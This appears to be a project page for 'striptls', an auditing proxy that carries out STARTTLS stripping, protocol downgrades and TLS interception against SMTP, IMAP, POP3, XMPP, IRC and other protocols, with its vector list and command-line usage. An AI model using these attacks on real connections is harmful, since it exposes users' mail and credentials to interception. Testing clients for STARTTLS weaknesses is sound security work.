striptls: proxy poc implementation of STARTTLS stripping attacks

striptls

striptls – auditing proxy

proxy poc implementation of STARTTLS stripping attacks.

A generic tcp proxy implementation and audit tool to perform protocol independent ssl/tls interception and STARTTLSstripping attacks on SMTPPOP3IMAPFTPNNTPXMPPACAP and IRC.

🏆 Trophies

Vectors

  • GENERIC
  • Intercept – protocol independent ssl/tls interception. peeks for TLS Handshake, converts socket to tls (tls-to-tls proxy)
  • InboundIntercept – protocol independent ssl/tls interception for the inbound channel only (tls-to-plain proxy)
  • SMTP
  • SMTP.StripFromCapabilities – server response capability patch
  • SMTP.StripWithInvalidResponseCode – client STARTTLS stripping, invalid response code
  • SMTP.UntrustedIntercept – STARTTLS interception (client and server talking ssl) (requires server.pem in pwd)
  • SMTP.StripWithTemporaryError
  • SMTP.StripWithError
  • SMTP.ProtocolDowngradeStripExtendedMode
  • SMTP.InjectCommand
  • SMTP.InboundStarttlsProxy – (starttls-to-plain proxy)
  • POP3
  • POP3.StripFromCapabilities
  • POP3.StripWithError
  • POP3.UntrustedIntercept
  • IMAP
  • IMAP.StripFromCapabilities
  • IMAP.StripWithError
  • IMAP.UntrustedIntercept
  • IMAP.ProtocolDowngradeToV2
  • FTP
  • FTP.StripFromCapabilities
  • FTP.StripWithError
  • FTP.UntrustedIntercept
  • NNTP
  • NNTP.StripFromCapabilities
  • NNTP.StripWithError
  • NNTP.UntrustedIntercept
  • XMPP
  • XMPP.StripFromCapabilities
  • XMPP.StripInboundTLS
  • XMPP.UntrustedIntercept
  • ACAP (untested)
  • ACAP.StripFromCapabilities
  • ACAP.StripWithError
  • ACAP.UntrustedIntercept
  • IRC
  • IRC.StripFromCapabilities
  • IRC.StripWithError
  • IRC.UntrustedIntercept
  • IRC.StripWithNotRegistered
  • IRC.StripCAPWithNotregistered
  • IRC.StripWithSilentDrop

Download

git clone https://github.com/tintinweb/striptls.git
cd striptls
setup.py install

Usage

#> python -m striptls --help    # from pip/setup.py

#> python striptls --help # from source / root folder
Usage: striptls.py [options]

example: striptls.py --listen 0.0.0.0:25 --remote mail.server.tld:25


Options:
-h, --help show this help message and exit
-q, --quiet be quiet [default: True]
-l LISTEN, --listen=LISTEN
listen ip:port [default: 0.0.0.0:<remote_port>]
-r REMOTE, --remote=REMOTE
remote target ip:port to forward sessions to
-k KEY, --key=KEY SSL Certificate and Private key file to use, PEM
format assumed [default: server.pem]
-s, --generic-ssl-intercept
dynamically intercept SSL/TLS
-b BUFFER_SIZE, --bufsiz=BUFFER_SIZE
-x VECTORS, --vectors=VECTORS
Comma separated list of vectors. Use 'ALL' (default)
to select all vectors, 'NONE' for tcp/ssl proxy mode.
Available vectors: ACAP.StripFromCapabilities,
ACAP.StripWithError, ACAP.UntrustedIntercept,
FTP.StripFromCapabilities, FTP.StripWithError,
FTP.UntrustedIntercept, GENERIC.Intercept,
IMAP.ProtocolDowngradeToV2,
IMAP.StripFromCapabilities, IMAP.StripWithError,
IMAP.UntrustedIntercept,
IRC.StripCAPWithNotRegistered,
IRC.StripFromCapabilities, IRC.StripWithError,
IRC.StripWithNotRegistered, IRC.StripWithSilentDrop,
IRC.UntrustedIntercept, NNTP.StripFromCapabilities,
NNTP.StripWithError, NNTP.UntrustedIntercept,
POP3.StripFromCapabilities, POP3.StripWithError,
POP3.UntrustedIntercept, SMTP.InboundStarttlsProxy,
SMTP.InjectCommand,
SMTP.ProtocolDowngradeStripExtendedMode,
SMTP.StripFromCapabilities, SMTP.StripWithError,
SMTP.StripWithInvalidResponseCode,
SMTP.StripWithTemporaryError, SMTP.UntrustedIntercept,
XMPP.StripFromCapabilities, XMPP.StripInboundTLS,
XMPP.UntrustedIntercept [default: ALL]

 

Example

                  inbound                    outbound

[inbound_peer]<------------->[listen:proxy]<------------->[outbound_peer/target]
smtp-client striptls remote/target

 

local smtp-client -> localhost:8825 (proxy) -> mail.gmx.net:25

Generic SSL/TLS Interception

--generic-ssl-intercept is a global switch to enable generic ssl/tls handshake detection and session conversion. Can be combined with any mangle/vector.

GENERIC.Intercept is a mangle/vector implementation of the ssl/tls handshake detect and convert feature.

# python striptls.py -l 0.0.0.0:9999 -r mail.gmx.com:465 -x GENERIC.Intercept

Audit Mode

iterates all protocol specific cases on a per client basis and keeps track of clients violating the starttls protocol. Ctrl+C to abort audit and print results.

#> python striptls –listen localhost:8825 –remote=mail.gmx.net:25

Source: https://github.com/tintinweb/